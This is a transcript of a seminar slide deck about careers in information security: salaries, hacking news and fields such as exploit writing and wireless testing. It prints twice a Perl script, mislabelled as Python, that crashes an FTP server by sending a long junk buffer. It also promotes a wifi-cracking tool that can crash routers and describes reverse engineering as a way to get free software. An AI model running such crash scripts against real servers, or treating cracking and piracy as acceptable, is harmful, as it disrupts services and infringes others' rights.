beyond ethical hacking by nipun jaswal , csa hcf infosec pvt. ltd
DESCRIPTION
Presentation on topics beyond the conventional ethical hacking , discusses job factors and scope in the security field :) this was presented in LPU (Lovely Professional University) as a Seminar with attendees over 200. Meet m e at FB if u want it fb/nipun.jaswalTRANSCRIPT
Life Beyond Ethical Hacking“ The Actual Information Security” By :-Nipun Jaswal (CSA , HCF Info sec Pvt. Ltd. )
Acknowledgements
Dr. H.S JohalMs. Himanshi
Lil About My Self
Certified With C|EH , CISE , AFCEH Associated With over 9 Companies Ambassador , EC-COUNCIL Creator Of India’s Fist DLP on
Web Application Penetration Testing Course Student @ LPU Tested Over 90+ Servers Currently working as Chief Security Analyst at
HCF Infosec Pvt. Ltd
Lets Go Old School ,What is Ethical Hacking?
Breaking Into Devices , Networks Legally.
Securing Servers, Recovering Emails etc. But the Question Remains !
Where to get these jobs ?
Jobs And Stats
Why More Jobs and Less People ?
Emerging Technology Still Register Work Don’t want to spend money Find it too difficult People Feel they can learn hacking
in 2 days workshop :-P No Proper facilities of required
courses
Salary Packages
Normal B.tech : 300K-400K BPO : 100K-250K DEVELOPMENT : 300K-700K SECURITY : 600K-1300K
Web Application Penetration testing
Exploit Writing Reverse Engineering Malware Analysis Computer Forensics Protocol Analysis
Beyond So Called “Ethical Hacking”
Jobs For Ethical Hacker:- Trainer Trainer Trainer Trainer And Trainer Salary Around : 15K + Incentives
Why To Go Beyond Ethical Hacking?
Jobs For Hackers:- Researchers Technical Heads Penetration testers Forensic Investigators Salary Around: 300-400K Per Month
Jobs Beyond Ethical Hacking:-
Benefits of not Being a Hacker
Benefits of Being a Hacker
I M UR WORST NIGHTMARE :-P
How To Let Your Dreams Come True?
Some Highly Paid Fields :- WAPT – Involves Testing of Web
Applications , Websites , Servers , Source code Auditing .
Exploit Writing – Finding Vulnerabilities in soft wares and Possibly to Exploit the Software .
Reverse Engineering :- Software cracking , Patches , Modifying Features of an end product
How To Let Your Dreams Come True?
Some Highly Paid Fields :- Wireless Testing :- Involves Network
Security infrastructure build up , Managing Networks , System Administration etc.
Projects :- Good At Coding? Show to the whole world .
Forensics : Highest Paid Job in the entire list Takes A lot , And Pays A lot
Why We Need More People ?
Source: Indian Express
Why We Need More People ?
Source: Times Of India
Host Gator Hacked !! 3 Lac Websites Owned By Hackers
Source: SoftPedia
Host Gator Hacked !! 3 Lac Websites Owned By Hackers Contd..
Source: Private
Norton India Hacked !!
Source: Private
Norton India’s Database Hacked !!
Source: Private
Norton India’s Database Hacked !!
Source: Private
The Biggest Of All… Anonymous!!
Source: National Post
Now Beyond The Word ‘Ethical’
Web Application Penetration Testing :-• Find Bugs In Web Applications – Custom Made ,
Open Source Applications .• Bugs which may compromise the security , make it
vulnerable , helps an attacker to steal sensitive information
• Now How To Perform 1 Out of 300 Tests In Web Applications Pen- Test?
• Lets See a Simple Example – SQL Injection Bypass
Rise Of The Web Applications
Fasten Your Seat Belts , Its Showtime
DEMO
Now Beyond The Word ‘Ethical’
Exploit Writing • Potentially writing codes to exploit a
vulnerability .• Highly Paid in Soft wares are vulnerable to
Exploits , which further may lead to compromise of the entire system.
• Requirement : C,C++, Perl , Python , Ruby , Assembly language
Now Beyond The Word ‘Ethical’
Simplest of The Exploit in Python- Crashing A Secure Port FTP Server
use strict;use Socket;my $junk = "\x41" x1000;my $host = shift || ‘192.168.15.1';my $port = shift || 200;my $proto = getprotobyname('tcp');my $iaddr = inet_aton($host);my $paddr = sockaddr_in($port, $iaddr);print "[+] Setting up socket\n";socket(SOCKET, PF_INET, SOCK_STREAM, $proto) or die "socket: $!";print "[+] Connecting to $host on port $port\n";connect(SOCKET, $paddr) or die "connect: $!";print "[+] Sending payload\n";print SOCKET $junk."\n";print "[+] Payload sent\n";close SOCKET or die "close: $!";
Now Beyond The Word ‘Ethical’
Simplest of The Exploit in Python- Crashing A Secure Port FTP Server
use strict;use Socket;my $junk = "\x41" x1000;my $host = shift || ‘192.168.15.1';my $port = shift || 200;my $proto = getprotobyname('tcp');my $iaddr = inet_aton($host);my $paddr = sockaddr_in($port, $iaddr);print "[+] Setting up socket\n";socket(SOCKET, PF_INET, SOCK_STREAM, $proto) or die "socket: $!";print "[+] Connecting to $host on port $port\n";connect(SOCKET, $paddr) or die "connect: $!";print "[+] Sending payload\n";print SOCKET $junk."\n";print "[+] Payload sent\n";close SOCKET or die "close: $!";
Now Beyond The Word ‘Ethical’
Prices for Various Exploits
Now Beyond The Word ‘Ethical’
Reverse Engineering• Editing the final software to find serials keys ,
stop the online authentications , • Mostly used by pirates • Sometimes used to edit the features of a final
software • Make your Life easier with free products
Now Beyond The Word ‘Ethical’
Wireless Penetration Testing• Involves Auditing of Network Security Over
Wireless• Installation of Servers And Security Devices • Crack proofing Wireless Passwords • Highly paid • Requires Networking Background
INSANITY WIFI CRACKER
Insanity Wi-fi Cracker • Developed By me and my Friends for minor
project • Automates the cracking of various wifi securities • Performs self MITM attack• DOS Service Can Crash the Routers For Ever :-P• Even an 8 Years old can press the button ‘c’ for
cracking and no. for a particular AP to crack
Wi-fi Cracking At a Click Of a Button
DEMO
So A One Last Question , Wanna go this ?
Or Wanna Go This ?
After AllIt’s your Career
|Handle it with care|
Any Questions ?
Contact
Email : [email protected]/nipun.jaswalwww.hatcon.inwww.hcf.co.inwww.starthack.comwww.cyber-rog.com/h3llwww.pentest.co.in